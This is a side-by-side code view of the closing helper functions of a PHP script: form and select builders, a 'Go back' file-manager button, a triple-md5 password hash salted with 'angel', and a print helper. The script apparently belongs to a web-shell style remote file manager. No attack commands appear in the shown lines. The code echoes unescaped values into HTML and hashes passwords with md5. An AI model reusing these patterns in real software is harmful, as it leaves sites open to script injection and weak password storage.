2083 if ($arg['nokey']) { 2083 if ($arg['nokey']) {
2084 foreach ($arg['option'] as $value) { 2084 foreach ($arg['option'] as $value) {
2085 if ($arg['selected']==$value) { 2085 if ($arg['selected']==$value) {
2086 p("<option value=\"$value\" selected>$value</option>"); 2086 p("<option value=\"$value\" selected>$value</option>");
2087 } else { 2087 } else {
2088 p("<option value=\"$value\">$value</option>"); 2088 p("<option value=\"$value\">$value</option>");
2089 } 2089 }
2090 } 2090 }
2091 } else { 2091 } else {
2092 foreach ($arg['option'] as $key=>$value) { 2092 foreach ($arg['option'] as $key=>$value) {
2093 if ($arg['selected']==$key) { 2093 if ($arg['selected']==$key) {
2094 p("<option value=\"$key\" selected>$value</option>"); 2094 p("<option value=\"$key\" selected>$value</option>");
2095 } else { 2095 } else {
2096 p("<option value=\"$key\">$value</option>"); 2096 p("<option value=\"$key\">$value</option>");
2097 } 2097 }
2098 } 2098 }
2099 } 2099 }
2100 } 2100 }
2101 p("</select>"); 2101 p("</select>");
2102 if ($arg['newline']) p('</p>'); 2102 if ($arg['newline']) p('</p>');
2103} 2103}
2104function formhead($arg = array()) { 2104function formhead($arg = array()) {
2105 global $self; 2105 global $self;
2106 !$arg['method'] && $arg['method'] = 'post'; 2106 !$arg['method'] && $arg['method'] = 'post';
2107 !$arg['action'] && $arg['action'] = $self; 2107 !$arg['action'] && $arg['action'] = $self;
2108 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; 2108 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2109 !$arg['name'] && $arg['name'] = 'form1'; 2109 !$arg['name'] && $arg['name'] = 'form1';
2110 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>"); 2110 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2111 if ($arg['title']) { 2111 if ($arg['title']) {
2112 p('<h2>'.$arg['title'].' &raquo;</h2>'); 2112 p('<h2>'.$arg['title'].' &raquo;</h2>');
2113 } 2113 }
2114} 2114}
2115 2115
2116function maketext($arg = array()){ 2116function maketext($arg = array()){
2117 !$arg['cols'] && $arg['cols'] = 100; 2117 !$arg['cols'] && $arg['cols'] = 100;
2118 !$arg['rows'] && $arg['rows'] = 25; 2118 !$arg['rows'] && $arg['rows'] = 25;
2119 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : ''; 2119 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2120 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>"); 2120 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2121} 2121}
2122 2122
2123function formfooter($name = ''){ 2123function formfooter($name = ''){
2124 !$name && $name = 'submit'; 2124 !$name && $name = 'submit';
2125 p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>'); 2125 p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
2126 p('</form>'); 2126 p('</form>');
2127} 2127}
2128 2128
2129function goback(){ 2129function goback(){
2130 global $self, $nowpath; 2130 global $self, $nowpath;
2131 p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>'); 2131 p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
2132} 2132}
2133 2133
2134function formfoot(){ 2134function formfoot(){
2135 p('</form>'); 2135 p('</form>');
2136} 2136}
2137 2137
2138function encode_pass($pass) { 2138function encode_pass($pass) {
2139 $pass = md5('angel'.$pass); 2139 $pass = md5('angel'.$pass);
2140 $pass = md5($pass.'angel'); 2140 $pass = md5($pass.'angel');
2141 $pass = md5('angel'.$pass.'angel'); 2141 $pass = md5('angel'.$pass.'angel');
2142 return $pass; 2142 return $pass;
2143} 2143}
2144 2144
2145function pr($s){ 2145function pr($s){
2146 echo "<pre>".print_r($s).'</pre>'; 2146 echo "<pre>".print_r($s).'</pre>';
2147} 2147}
2148 2148
2149?> 2149?>